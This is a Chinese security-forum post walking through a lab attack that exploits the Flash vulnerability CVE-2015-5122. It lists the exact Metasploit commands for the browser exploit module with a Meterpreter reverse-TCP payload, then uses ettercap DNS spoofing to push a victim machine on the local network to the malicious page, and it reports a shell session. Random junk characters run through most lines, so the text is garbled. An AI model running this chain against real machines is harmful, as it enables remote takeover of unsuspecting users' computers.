找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1544|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 p0 A% f' K* @4 e) S9 ^6 B 二、cve2015-5122漏洞实例演示虚拟机 * y5 n6 v0 P6 N! K6 C

0 a9 n" G: c! g) L

/ V/ U2 P1 J0 a1 ?1 Y7 P5 p   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 4 v+ o* y V+ S+ q, g" T: d

8 j" P0 ]: v2 [, [

) X# h, S7 z! _ ~& J& u4 `0 K7 \ search cve-2015-5122如图: 9 I2 E( |1 V% c. d3 E- P" D

5 _( V. J. u& A) m2 k4 O

0 b$ {) }" d t+ X$ [& `. \   / Z& t0 P3 V) ~/ f5 w, s

1 Y% T7 j( ?7 ?6 S$ \/ u% X

& u# i- U5 Z* G0 v1 Q# C 下面我们敲如下命令: 9 r# e" M; |9 G( w2 A2 r

) |" t& ~% |" P7 P! O8 Y

; ~1 v7 t+ [+ Q" l9 A+ c use exploit/multi/browser/adobe_flash_opaque_background_uaf ! g' _9 i9 G9 w) W7 U7 k

* M) R" N# ]! M% F/ E% j2 n/ f5 {

[% L9 a6 I5 H set PAYLOAD windows/meterpreter/reverse_tcp & y3 `" u& [9 r2 Q! m

" \: N+ R0 b+ F+ t) {# X

; v% z/ G& M& i" L( L& K0 l6 x set LHOST 192.168.0.109 @* J( ]3 V: ~/ g

7 \! _7 s* _; ^+ `& }( p2 w0 e+ O

7 P8 U4 ^0 E: M4 u6 |7 c set URIPATH /                        /*根目录*/ & N1 R1 e( K# m9 R% w. l# P

/ i3 i7 W$ `: L" o7 Y# R: m/ {

0 D5 m% B7 G$ g( P; c" j set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 : l) ~0 ]* z% V: M1 C$ D! ]# ^ `/ z

$ Q& F4 w( l* J9 u: J: v& S

v4 d: e( [3 p% b0 @; Q set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 9 j$ u5 x7 p1 R# ?: m2 e

( Y6 T) F0 p& W: Z6 Z2 |; t

/ {0 H1 N7 e9 M3 ?4 {$ z7 Z 然后show options如图: - x: k+ Z Z. V H% h& R" y

4 x$ q3 @# ]# c# H

9 }2 k$ Q1 K9 {% P   ; P) z" T- l. ?+ U) D4 H- Q1 x

( d- A8 I3 b( {3 [/ u' g2 v

; |5 m; S0 M2 T' j9 {: _ 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
5 l; c- I# g/ D: q
$ W1 L$ v5 _9 f

# X# g4 U+ M, A4 z/ N' P- J( I

5 B8 x* j7 \4 b9 ^$ |' D1 u 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 4 J- ~4 `0 Q8 T, Y; k' `/ v* D

! J- C5 X: ^. f( ^; J

- a) u+ _1 ]3 B0 f* s Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf & ^: O. u- Q u$ Y7 D

; M. c' {. r! Z" @

. l8 c4 N) R4 K$ w3 R   1 [2 D' q$ h/ }4 \ j, r2 K8 E9 g7 R

; A) v" N# I: f4 y

+ [7 B* a& p: u# S, L 成功了,这时候我们断开ettercap,如图: + Z$ o8 p. H( n4 X- R* M. Z

5 S* F5 ~$ } ~( q; n# F

9 r- n; I' D: S   % H5 T) ^3 ]0 Q) w9 v

7 B+ d* b" C) L+ e8 S+ N

# O+ z9 d4 P# o Screenshot如图: , h6 s; T) A) Q

, v# E [8 Q* m

6 n" \9 S4 G5 Z   % I/ @4 |( t) \! M

2 Q( _' x$ M" o* B* a4 n2 V

: i$ L' v8 O& C. E7 \4 X & z% @8 p) E1 [9 ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表